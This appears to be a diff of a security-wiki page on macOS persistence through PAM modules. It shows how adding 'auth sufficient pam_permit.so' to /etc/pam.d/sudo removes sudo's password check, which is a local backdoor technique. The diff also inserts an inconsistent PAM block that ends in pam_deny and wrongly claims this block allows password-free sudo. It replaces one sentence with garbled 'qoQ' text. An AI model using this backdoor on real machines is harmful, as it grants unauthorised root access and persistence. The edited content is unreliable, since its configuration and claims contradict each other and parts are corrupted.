khaledalmaarii/HackTricks-wiki/macos-hardening/macos-auto-start-locations.md

 #### Description & Exploitation

-As PAM is more focused in **persistence** and malware that on easy execution inside macOS, this blog won't give a detailed explanation, **read the writeups to understand this technique better**.
+As PAM is more focused in persistence and malware that on easy execution inside macOS, this blog won't give a detailed explanation, read the writeups to understand this technique better.

 Check PAM modules with:
 ```bash
 ls -l /etc/pam.d
 ```

-A persistence/privilege escalation technique abusing PAM is as easy as modifying the module /etc/pam.d/sudo adding at the beginning the line:
+# /etc/pam.d/sudo

+auth       sufficient     pam_tid.so
+auth       required       pam_permit.so
+auth       required       pam_opendirectory.so
+auth       required       pam_deny.so
+account    required       pam_permit.so
+password   required       pam_deny.so
+session    required       pam_permit.so

+This will allow any user to execute sudo without providing a password.
+Keep in mind that modifying system files like this can have serious security implications and should only be done in controlled environments for testing purposes.
 ```bash
 auth       sufficient     pam_permit.so
 ```

-So it will **looks like** something like this:
+So **qoQ** will **qoQ** something like this:
 ```bash
 # sudo: auth account password session
 auth       sufficient     pam_permit.so